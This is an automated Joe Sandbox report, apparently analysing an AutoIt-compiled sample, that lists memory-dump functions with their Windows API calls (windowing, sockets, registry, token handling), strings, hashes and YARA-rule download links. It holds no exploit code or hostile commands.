API String ID: 395352322-0
Opcode ID: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
Instruction ID: cc52f0048640869a41f8923acebcd980d42e0dce3a704ae795e611cad8b9c9b7
Opcode Fuzzy Hash: 27fb59f247a989ebfe5ce4cc7718d0918dc3ba20bafe8c6bf055d05ef3e27f4d
Instruction Fuzzy Hash: 7F3109B190111DFFEB159B91DC89EFEB7BCEF08304F0051AAE601F2151EA749E49DAA4

Function 00EF653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EF655B
GetWindowLongW.USER32(01775850,000000F0), ref: 00EF658E
GetWindowLongW.USER32(01775850,000000F0), ref: 00EF65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EF65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EF661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00EF6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EF664A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
Instruction ID: dd5517df3cc2f44a5bda95216241465ed58f5c3eb8955334ccfc311985fedfce
Opcode Fuzzy Hash: 9acee9adc5fc5eaa86ee9990a4c9019f55b466c9b1ea713eedc27ae77a86904e
Instruction Fuzzy Hash: 0F310331604118AFDB208F19DC84F6537E1FF4A328F1951A8F605EB2B6CB61AC44DB91

Function 00EE6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB

socket.WSOCK32(00000002,00000001,00000006), ref: 00EE64D9
WSAGetLastError.WSOCK32(00000000), ref: 00EE64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6521
connect.WSOCK32(00000000,?,00000010), ref: 00EE652A
WSAGetLastError.WSOCK32 ref: 00EE6534
closesocket.WSOCK32(00000000), ref: 00EE655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE6576

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
Instruction ID: e6f8e4b4bdb631615f1f678c0923d7e7d9ca73a6f670b9159c2ef7c6a68f2c4b
Opcode Fuzzy Hash: d94a74fe76a04468eb84543046a06f26b021bc33cc6c94a31187c2fb76661d9b
Instruction Fuzzy Hash: BB31A171600118AFDB10AF25DC85BBE7BE8EF94764F009069F909B72D1CB70AD08CB61

Function 00ECE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE120
SysAllocString.OLEAUT32(00000000), ref: 00ECE123
SysAllocString.OLEAUT32 ref: 00ECE144
SysFreeString.OLEAUT32 ref: 00ECE14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE167
SysAllocString.OLEAUT32(?), ref: 00ECE175

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ce3dd492c5aa9b64242dc2a241a5d8dc29cb21ba66a0201145ac8b89af9af9d0
Instruction ID: 0b80d3ba3076f283b143a596d6a66563bb436cc5225eb37d0d44096fe840ff1d
Opcode Fuzzy Hash: ce3dd492c5aa9b64242dc2a241a5d8dc29cb21ba66a0201145ac8b89af9af9d0
Instruction Fuzzy Hash: E421A132601108AF9B109FA9DD88DBB77ECEF49760B448129F914EB360DA71DC42CB64

Function 00ECFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00ECFB81
__wcsnicmp.LIBCMT ref: 00ECFBA2
__wcsnicmp.LIBCMT ref: 00ECFBBC

Strings

#OnAutoItStartRegister, xrefs: 00ECFBB6
#requireadmin, xrefs: 00ECFB9C
#notrayicon, xrefs: 00ECFB79

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: bdf27722cda015e888fa74c73b23c837e4e36541b7343a8a017f5d0bad45fac4
Instruction ID: 49a9adefa1611336c130d6d02bb3d8a25eaa137e9571f2d37ad253506bcd9200
Opcode Fuzzy Hash: bdf27722cda015e888fa74c73b23c837e4e36541b7343a8a017f5d0bad45fac4
Instruction Fuzzy Hash: 04213A7220415166D630E634DE12FE7B3E9DF51354F14A03DF885B6181EB73AE83E2A5

Function 00EF783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EF78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EF78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EF78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EF78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EF78D4

Strings

Msctls_Progress32, xrefs: 00EF7872

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
Instruction ID: d802f4a06b36322d646b30c51015666d5f89ac1e016b6cb156e004209e995d8d
Opcode Fuzzy Hash: 0165fae795f1ad804bb39d86d9cb34cb4bcfec1778e70c3564113c91befefc82
Instruction Fuzzy Hash: 2B118EB211022DBEEF159E60CC85EE77F6DEF087A8F015124FB44A2090CB729C21DBA4

Function 00E941C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E94292,?), ref: 00E941E3
GetProcAddress.KERNEL32(00000000), ref: 00E941EA
EncodePointer.KERNEL32(00000000), ref: 00E941F6
DecodePointer.KERNEL32(00000001,00E94292,?), ref: 00E94213

Strings

RoInitialize, xrefs: 00E941D2
combase.dll, xrefs: 00E941DE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
Instruction ID: 7f9f9b08c6801b7605c1236169d4978f6c6096dee2b81566568ab2aa79870b9f
Opcode Fuzzy Hash: e3296cfec77c54d87a669595548f3ea1b7c176bd421d2624c03d65183437c566
Instruction Fuzzy Hash: 44E012B06917449EEF116B72EC4DF243696BB51716F504424F411F50F0DBF56495EF20

Function 00E9429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E941B8), ref: 00E942B8
GetProcAddress.KERNEL32(00000000), ref: 00E942BF
EncodePointer.KERNEL32(00000000), ref: 00E942CA
DecodePointer.KERNEL32(00E941B8), ref: 00E942E5

Strings

RoUninitialize, xrefs: 00E942A7
combase.dll, xrefs: 00E942B3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
Instruction ID: 7cdebf43aceba428a10d62c50bd6a441720b261045dd7972d20e2e34b9b3f516
Opcode Fuzzy Hash: cc2bb689d9805d28c0b7f752a30ce9729e5ad84dd5c274c130f963b22fd5e5e6
Instruction Fuzzy Hash: D7E0B6B8692705AFEB51AB61EC0DF153AA6BB64B56F104024F001F12F0CBB4A988FA15

Function 00ED675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ED68AD
_memmove.LIBCMT ref: 00ED67E8

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

_memmove.LIBCMT ref: 00ED685B
_memmove.LIBCMT ref: 00ED6942
_memmove.LIBCMT ref: 00ED695B
_memmove.LIBCMT ref: 00ED6977

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: cd0f19026607771e4206361ee0657024ef77af5333a46932f83a890dab33a7b6
Instruction ID: 9f8a1b431f10ccb39d5747a8c1d13ed3ce982a487aa6ca9283ece15248dc7883
Opcode Fuzzy Hash: cd0f19026607771e4206361ee0657024ef77af5333a46932f83a890dab33a7b6
Instruction Fuzzy Hash: 8161BB3050065A9BDF15EF20C882EFE37E5EF84308F04A55AF9597B292DB31AD42DB50

Function 00EF046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EF05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EF05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EF0617
RegCloseKey.ADVAPI32(00000000), ref: 00EF0624

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 05979ea06e9ff53feeb2ffc3f47eafbf38aa7a258df47a7810db149ea58aae01
Instruction ID: 86457dff544992663e5165cc0102a3c212c0432117c9e61274acd208a2751a24
Opcode Fuzzy Hash: 05979ea06e9ff53feeb2ffc3f47eafbf38aa7a258df47a7810db149ea58aae01
Instruction Fuzzy Hash: 0D515C31208204AFCB14EF54C885E6FBBE9FF84314F04995DF699A72A2DB71E905CB52

Function 00EF5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00EF5A82
GetMenuItemCount.USER32(00000000), ref: 00EF5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EF5AE1
GetMenuItemID.USER32(?,?), ref: 00EF5B50
GetSubMenu.USER32(?,?), ref: 00EF5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00EF5BAF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 30bd4133a5dea36eda217f4bf1a87f3bb73910716310fb8c06aaf2b713b7702a
Instruction ID: 76778880648d8c89d5eca813102daca1107fc69a6a4c8b1299faed80fa0ac80f
Opcode Fuzzy Hash: 30bd4133a5dea36eda217f4bf1a87f3bb73910716310fb8c06aaf2b713b7702a
Instruction Fuzzy Hash: 60516C36A00A19AFCF15DF64C845ABEB7F4EF58320F1054A9EA15B7351DB30AE41CB90

Function 00ECF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00ECF3F7
VariantClear.OLEAUT32(00000013), ref: 00ECF469
VariantClear.OLEAUT32(00000000), ref: 00ECF4C4
_memmove.LIBCMT ref: 00ECF4EE
VariantClear.OLEAUT32(?), ref: 00ECF53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ECF569

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
Instruction ID: f997d498c462ca7590d056fe1cf2ba65fea28bc8ea08f6a6ac055dde6b0b2af4
Opcode Fuzzy Hash: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
Instruction Fuzzy Hash: 5D516CB5A00209DFCB14CF58D880EAAB7B9FF4C314B158569ED59EB300D731E916CBA0

Function 00ED26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2792
IsMenu.USER32(00000000), ref: 00ED27B2
CreatePopupMenu.USER32 ref: 00ED27E6
GetMenuItemCount.USER32(000000FF), ref: 00ED2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00ED2875

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
Instruction ID: dd56ba3e98ac0ce4025484064cc9baba4e66ddce2d75f2dc51ea7c5d9572ed76
Opcode Fuzzy Hash: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
Instruction Fuzzy Hash: 7B519F74A00205DFDF28CF68D888AADBBF5EF64318F10526EE611BB390D7719906DB51

Function 00E71765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00E7179A
GetWindowRect.USER32(?,?), ref: 00E717FE
ScreenToClient.USER32(?,?), ref: 00E7181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E7182C
EndPaint.USER32(?,?), ref: 00E71876

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
Instruction ID: e219a1c4d3cc6517893a18f6a35312483c57050f27538babfaa9cc6ef14b64c5
Opcode Fuzzy Hash: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
Instruction Fuzzy Hash: 0B419471104304AFD710DF29CC84FBA7BE9EF4A724F148669F598EB2A2C7319845DB62

Function 00EFB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00F367B0,00000000,01775850,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFB9CC
EnableWindow.USER32(00000000,00000000), ref: 00EFB9F0
ShowWindow.USER32(00F367B0,00000000,01775850,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFBA50
ShowWindow.USER32(00000000,00000004,?,00EFB862,?,?), ref: 00EFBA62
EnableWindow.USER32(00000000,00000001), ref: 00EFBA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EFBAA9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
Instruction ID: e06649308c71dc6c34ed21c276bedc4ce7c71a789ddd4a2e3ac34e3ca9e906c6
Opcode Fuzzy Hash: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
Instruction Fuzzy Hash: D9417130600649AFDB21CF15C889BB57BE0FF45318F1852B9EB58AF6A2C771E845CB50

Function 00EE73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00EE5134,?,?,00000000,00000001), ref: 00EE73BF

Part of subcall function 00EE3C94: GetWindowRect.USER32(?,?), ref: 00EE3CA7

GetDesktopWindow.USER32 ref: 00EE73E9
GetWindowRect.USER32(00000000), ref: 00EE73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EE7422

Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E

GetCursorPos.USER32(?), ref: 00EE744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EE74AC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
Instruction ID: 554b9e48d0e987f218eccc6954d24dc3868d54db6c6b0be4ee9942befefffb94
Opcode Fuzzy Hash: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
Instruction Fuzzy Hash: 1931E672508349AFD720DF15D849F9BBBE9FF88314F00191AF599A7191DB30E909CB92

Function 00EC8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
Part of subcall function 00EC85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
Part of subcall function 00EC85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
Part of subcall function 00EC85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E

GetLengthSid.ADVAPI32(?,00000000,00EC8977), ref: 00EC8DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EC8DB8
HeapAlloc.KERNEL32(00000000), ref: 00EC8DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00EC8DD8
GetProcessHeap.KERNEL32(00000000,00000000,00EC8977), ref: 00EC8DEC
HeapFree.KERNEL32(00000000), ref: 00EC8DF3

Memory Dump Source

